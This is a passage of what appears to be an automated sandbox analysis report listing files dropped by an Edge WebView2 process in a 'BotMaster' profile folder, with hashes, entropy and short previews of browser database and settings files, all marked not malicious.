                                                                                                                                                                                                                Preview:2024/03/10-17:46:01.316 1d5c Creating DB C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Site Characteristics Database since it was missing..2024/03/10-17:46:01.368 1d5c Reusing MANIFEST C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Site Characteristics Database/MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Site Characteristics Database\MANIFEST-000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Sync Data\LevelDB\000001.dbtmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Sync Data\LevelDB\000003.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):46
                                                                                                                                                                                                                Entropy (8bit):4.019797536844534
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:sLollttz6sjlGXU2tkn:qolXtWswXU2tkn
                                                                                                                                                                                                                MD5:90881C9C26F29FCA29815A08BA858544
                                                                                                                                                                                                                SHA1:06FEE974987B91D82C2839A4BB12991FA99E1BDD
                                                                                                                                                                                                                SHA-256:A2CA52E34B6138624AC2DD20349CDE28482143B837DB40A7F0FBDA023077C26A
                                                                                                                                                                                                                SHA-512:15F7F8197B4FC46C4C5C2570FB1F6DD73CB125F9EE53DFA67F5A0D944543C5347BDAB5CCE95E91DD6C948C9023E23C7F9D76CFF990E623178C92F8D49150A625
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...n'................_mts_schema_descriptor...

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Sync Data\LevelDB\CURRENT (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):311
                                                                                                                                                                                                                Entropy (8bit):5.2768750398986475
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:FQVBuTEq1wknaZ5KrWLYQV+dgx2KLlvQVH/+q2PwknaZ5KrWLYQV+dWIFUv:SN1rHUdgVL6EvYrHUdPFUv
                                                                                                                                                                                                                MD5:957CAA84AEFAB6588FE84589F72ACEE0
                                                                                                                                                                                                                SHA1:CE9C07AC5EAFB90E97D6CFA58FB4E6F81953371D
                                                                                                                                                                                                                SHA-256:A0DBFF0AF7252D92F1FF80309A7859D26B41F6376DDDC8690CBA96B3B4540D61
                                                                                                                                                                                                                SHA-512:C19903F65A24D8AFF164F22FA51C950F9E3AA0F9A069E1D3AB50CA094E294A943FD00BFD20D76BDA2925653CA3E23CC2129934DEE015969BA30E864503293789
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:2024/03/10-17:46:02.189 1f88 Creating DB C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Sync Data\LevelDB since it was missing..2024/03/10-17:46:02.212 1f88 Reusing MANIFEST C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Sync Data\LevelDB/MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Sync Data\LevelDB\MANIFEST-000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Top Sites

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                Entropy (8bit):0.3528485475628876
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
                                                                                                                                                                                                                MD5:F2B4FB2D384AA4E4D6F4AEB0BBA217DC
                                                                                                                                                                                                                SHA1:2CD70CFB3CE72D9B079170C360C1F563B6BF150E
                                                                                                                                                                                                                SHA-256:1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
                                                                                                                                                                                                                SHA-512:48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Visited Links

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):131072
                                                                                                                                                                                                                Entropy (8bit):0.004331346565552329
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:ImtVf7l+t/vuDB:IiVMNuDB
                                                                                                                                                                                                                MD5:E50DBBDCB509389ADD33667BB85D1C54
                                                                                                                                                                                                                SHA1:C6B53A814D8D5E98DF095DF2DECA616C8A11922D
                                                                                                                                                                                                                SHA-256:864EAD5287677E5B8C58F59365519A04F961CC7A39F10984A5A790B545D1F7D0
                                                                                                                                                                                                                SHA-512:9638E0E9226010304258A68AF009F81A127135EDA846E60AC6D06F5AB23551816C17959664CACC6336B6225F73DAFA8E36416A563A1161A181183A7DFC54C621
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:VLnk.....?.......`...}..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Web Data

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 87, cookie 0x36, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):178176
                                                                                                                                                                                                                Entropy (8bit):0.9328712687751187
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:R2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+c:R2qOB1nxCkvSAELyKOMq+c
                                                                                                                                                                                                                MD5:6B2D5ED0A90C99FD05D58FE8E924C886
                                                                                                                                                                                                                SHA1:34E1103E18E57E9D1769C89DFB2DAD84BFDD54B5
                                                                                                                                                                                                                SHA-256:2873E973AB5B91CD07405FD5D35E2A843A408AD53696372BEC794F4582368E49
                                                                                                                                                                                                                SHA-512:08373748A19C0381866090CB60929A4642BB624AF777240CB63B918180CEEE0C80DFAD852830FC6821AD6266DF1A865940A90D2089621F612617C5E92A4B29B2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ .......W...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Web Data-journal

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2568
                                                                                                                                                                                                                Entropy (8bit):0.06569804787746028
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Ccyll/l1lOtl0U:CcyHhU
                                                                                                                                                                                                                MD5:64CE842E2F70CE60D14AF5F80F16CB07
                                                                                                                                                                                                                SHA1:5F09BC2699B215DABC506E05724EA0E80D1D063F
                                                                                                                                                                                                                SHA-256:4CF29D5A1EDBBB6AB0B2B38EDC3A290308C602FF98ACB9D78B8DAE5662361EE9
                                                                                                                                                                                                                SHA-512:20FB499A55AECF2A1CA912AAFFE9804DD9216FD12F2BB1E49638BAD9C58B1587E6C827AA487EEFD0948CCEF2F57678652E3261B46E461EBF7C0F696499D6B3EE
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.............:Bq...W....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                Entropy (8bit):0.4718145827103311
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBSRaH4d:v7doKsKuKZKlZNmu46yjxw
                                                                                                                                                                                                                MD5:E99B0980DA2C2791AC4A407511FFB50B
                                                                                                                                                                                                                SHA1:6F231560DC38FAA0E76243D78752F030080E90D4
                                                                                                                                                                                                                SHA-256:FA5D40F1CEC53000F705B1F0A8A9044D19A8D9614E0976DA22B86019F7BF9BE2
                                                                                                                                                                                                                SHA-512:1E5CA64C2B6469CFC69BA1BC64DDB82523B0D8F4BBB9BA4E81B4D9683029789416308547AF06553190D799851360F4B24475DE72CDEEF6DD0F31EFC453F508AA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\a11db4cb-146c-473d-b4d4-a0f98a792da7.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5988
                                                                                                                                                                                                                Entropy (8bit):4.851290637104523
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:st3/GQs13bb9JtG8zFd81h6Cb7/x+6MhmuecAJ1wa1eAees2MR7K:stPRsVtGk/8vbV+FcJmaQA+PhK
                                                                                                                                                                                                                MD5:D261CBA59B14381E95501DA07A161122
                                                                                                                                                                                                                SHA1:E8953F9DAFEFA84B5E939CFDA857CA538BD928B1
                                                                                                                                                                                                                SHA-256:38BBE2C88A013056F7F373565462D9D0CEC393141B95A61BEF0DB50BEB5AF731
                                                                                                                                                                                                                SHA-512:C94C2377C7FB9F8450024EC6E4E2A2FF9186738F371A24D6564F96BAEB1FA1CE8B603A3F2600534E03C88194B7CEA4758AE6CCA4B3445548B322AB487A46A90E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13354562762322933","alternate_error_pages":{"backup":true,"enabled":false},"autocomplete":{"retention_policy_last_version":117},"autofill":{"autostuff_enabled":false,"credit_card_enabled":false,"custom_data_enabled":false,"custom_data_fill_enabled":false,"custom_data_identify_info_from_form_enabled":false,"custom_data_save_enabled":false},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"browser_content_container_height":133,"browser_content_container_width":206,"browser_content_container_x":0,"browser_content_container_y":0,"countryid_at_install":17224,"credentials_enable_service":false,"dips_timer_last_update":"13354562762154074","domain_diversity":{"last_reporting_timestamp":"13354562762321885"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\databases\Databases.db

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\e55fe678-5708-47c9-ab9f-4721a1a516b4.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6780
                                                                                                                                                                                                                Entropy (8bit):5.580563857813087
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:vUiUPlf/ROoBpkF5d1Qil7VaTEv9V5h5pg5vezodIU8z2KZSpsA5IOrMn3YPo0M7:tArsT9l57SpFIOAn3go0iuc
                                                                                                                                                                                                                MD5:B4B83991611C4211816ADBB125BF71C4
                                                                                                                                                                                                                SHA1:9B9A8C998EE2F3ABDDA29A2CB1A34F61B9D440FF
                                                                                                                                                                                                                SHA-256:2192040C259D97C6842AB2E3E496B2F38137F04A5328F6F4D15592F00AC6A031
                                                                                                                                                                                                                SHA-512:DF9A8F6BE1161F5DF91853FD00E16BF7DD5D2A3F0404F93FC99A23B3BB3B31E7F81D4CC2B74C0FF60C391E0A3F10EE593700E35EDFDA686970DB0D2A91299671
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"extensions":{"settings":{"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13354562761313139","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13354562761313139","location":5,"manifest":{"content_capabilities":{"include_globs":["https://*excel.officeapps.live.com/*","https://*onenote.officeapps.live.com/*","https://*powerpoint.officeapps.live.com/*","https://*word-edit.officeapps.live.com/*","https://*excel.officeapps.live.com.mcas.ms/*","https://*onenote.officeapps.live.com.mcas.ms/*","https://*word-edit.officeapps.live.com.mcas.ms/*","https://*excel.partner.officewebapps.cn/*","https://*onenote.partner.officewebapps.cn/*","https://*powerpoint.partner.officewebapps.cn/*","https://*word-edit.partner.officewebapps.cn/*","https://*excel.gov.online.office365.us/*","

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\f140047a-9d90-499d-8932-12bc19bcee90.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6325
                                                                                                                                                                                                                Entropy (8bit):4.855454300027943
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:st3/BQs13bb9JtG8zZ85eh6Cb7/x+6MhmuecAJ1wa1eAee102MR7K:stPOsVtGkZ88bV+FcJmaQAb0PhK
                                                                                                                                                                                                                MD5:EBC5E52E432F85A6C6B37A52FFE8795C
                                                                                                                                                                                                                SHA1:4E77C19D3EE07C980D1895EA33083202C6CAD015
                                                                                                                                                                                                                SHA-256:89256E0BC65795DD8F529BB02361E13720DF87188EF0855411AABF1857EB5CF5
                                                                                                                                                                                                                SHA-512:443C27CB695AB7C04E8F2A17681359F1E2DA0B9324C56D9534A2F78999F93B5A16676CC80EC7BC13BE32B8D3D5A6CED91A3E9E87F1F52C87C4CBB702D0A910B7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13354562762322933","alternate_error_pages":{"backup":true,"enabled":false},"autocomplete":{"retention_policy_last_version":117},"autofill":{"autostuff_enabled":false,"credit_card_enabled":false,"custom_data_enabled":false,"custom_data_fill_enabled":false,"custom_data_identify_info_from_form_enabled":false,"custom_data_save_enabled":false},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"browser_content_container_height":576,"browser_content_container_width":1049,"browser_content_container_x":0,"browser_content_container_y":0,"countryid_at_install":17224,"credentials_enable_service":false,"dips_timer_last_update":"13354562762154074","domain_diversity":{"last_reporting_timestamp":"13354562762321885"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data"

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\heavy_ad_intervention_opt_out.db

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                Entropy (8bit):0.35226517389931394
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
                                                                                                                                                                                                                MD5:D2CCDC36225684AAE8FA563AFEDB14E7
                                                                                                                                                                                                                SHA1:3759649035F23004A4C30A14C5F0B54191BEBF80
                                                                                                                                                                                                                SHA-256:080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
                                                                                                                                                                                                                SHA-512:1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db\000001.dbtmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):195
                                                                                                                                                                                                                Entropy (8bit):2.7998631831187235
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:VVXntjQPEnjQvxljljljljljljl:/XntM+4ljljljljljljl
                                                                                                                                                                                                                MD5:00C0DEFAC69CFE6E18C6FD4D684D6625
                                                                                                                                                                                                                SHA1:F80E1AB029E1116EE2FE85B2ECBF0959CCE884A7
                                                                                                                                                                                                                SHA-256:1FCAFCF037F8CE32A6EB94539F4A7D67FC51FE2BD8EDBD95C1D0322841EEC8A2
                                                                                                                                                                                                                SHA-512:C9411AEDDD3937D778BFE37FD489409E49304EBF3D3E7D686BDE4EE9C71E23A57224B622902948AD4BB422FFF3FB9386D02F956807FFF0185E9EF99FA2E157CF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:A..r.................20_1_1...1.,U.................20_1_1...1..&f.................&f.................&f.................&f.................&f.................&f.................&f...............

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db\CURRENT (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\shared_proto_db\LOG

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):307
                                                                                                                                                                                                                Entropy (8bit):5.325655815610261
                                                                                                                                                                                                                Encrypted:false
